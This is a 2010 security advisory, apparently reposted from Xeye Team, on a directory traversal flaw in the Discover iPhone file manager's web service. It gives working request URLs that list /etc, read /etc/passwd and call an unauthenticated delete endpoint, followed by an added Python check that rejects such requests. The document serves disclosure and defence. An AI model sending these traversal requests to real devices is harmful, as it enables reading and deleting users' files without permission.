Directory traversal vulnerability in the web service of the Discover file manager for iPhone/iPod touch

2010-06-20T00:00:00
ID MYHACK58:62201027296
Type myhack58
Reporter Anonymous
Modified 2010-06-20T00:00:00

Description

From: Xeye Team

Discover is a popular file manager for the iPhone/iPod touch platform. It can read PDF, Office and TXT files and share them over Wi-Fi. For a detailed description, see: http://itunes.apple.com/us/app/discover/id292416855?mt=8#

Vulnerability analysis

When an iPhone/iPod touch user on a Wi-Fi network opens Discover, it automatically turns on remote web access. The web interface is a Flash-based file management interface, as shown in the following figure. Discover has two directories, Private and Public. Under "Settings" -> "File security settings" you can set a password for web access, with HTTP Digest as the authentication type, but this protects only the Private directory.

[Figure: Discover's Flash-based web file management interface]

Some API endpoints of Discover's web service do not strictly authenticate the user and are vulnerable to directory traversal. An attacker can use the web service API to access files in any directory that the iPhone/iPod `mobile` user has permission to access, and can delete any file that the `mobile` user has permission to delete.

Exploit

1. First, list a directory: http://192.168.1.9:8888/list?sort=%27&format=xml&dir=/Public/../../../../../../../etc/&order=asc


2. Read file contents. Although our permissions are only those of the `mobile` user, read access is still very wide: http://192.168.1.9:8888/web?path=history/../../../../../../../../etc/passwd


There is also a delete API: http://192.168.1.9:8888/delete?path=/Private/&format=none
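A server-side check that would reject the requests shown above, as an added example that is not part of the original advisory or the vendor's code. The function names, the temporary share root and the policy (only paths under Public or Private are served; Private and every delete require a successful login) are assumptions.

```python
import os
import tempfile
from urllib.parse import urlsplit, parse_qs

ALLOWED_TOP = ("Public", "Private")  # the two directories the advisory names
PATH_PARAMS = {"/list": "dir", "/web": "path", "/delete": "path"}  # endpoints from the advisory


class Rejected(Exception):
    """Raised when a request must not be served."""


def resolve(share_root, requested):
    """Return (top_dir, canonical_path) for a client path, or raise Rejected."""
    root = os.path.realpath(share_root)
    # Always interpret the client path relative to the share root.
    candidate = os.path.realpath(os.path.join(root, requested.lstrip("/")))
    # Check containment on the canonical form, after ".." and symlinks are resolved.
    if os.path.commonpath([root, candidate]) != root:
        raise Rejected("path escapes the share root")
    top = os.path.relpath(candidate, root).split(os.sep)[0]
    if top not in ALLOWED_TOP:
        raise Rejected("path is not under Public or Private")
    return top, candidate


def authorize(share_root, url, authenticated):
    """Apply the same checks to every endpoint and return the path to serve."""
    parts = urlsplit(url)
    param = PATH_PARAMS.get(parts.path)
    if param is None:
        raise Rejected("unknown endpoint")
    values = parse_qs(parts.query).get(param, [])  # percent-decoded exactly once
    if len(values) != 1 or "\x00" in values[0]:
        raise Rejected("missing, repeated or malformed path parameter")
    top, real = resolve(share_root, values[0])
    # Assumed policy: Private and every delete need a successful Digest login.
    if not authenticated and (top == "Private" or parts.path == "/delete"):
        raise Rejected("authentication required")
    return real


if __name__ == "__main__":
    root = tempfile.mkdtemp()  # constructed stand-in for the app's document root
    for url in ("http://192.168.1.9:8888/web?path=history/../../../../../../../../etc/passwd",
                "http://192.168.1.9:8888/delete?path=/Private/&format=none",
                "http://192.168.1.9:8888/web?path=/Public/notes.txt"):  # last URL is constructed
        try:
            print("serve ", authorize(root, url, authenticated=False))
        except Rejected as why:
            print("reject", url, "->", why)
```

The containment test runs on the canonical path rather than on the raw string, so percent-encoded `..` segments and symlinks inside the shared directories are handled by the same check.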

Vendor

http://www.mappn.com/community/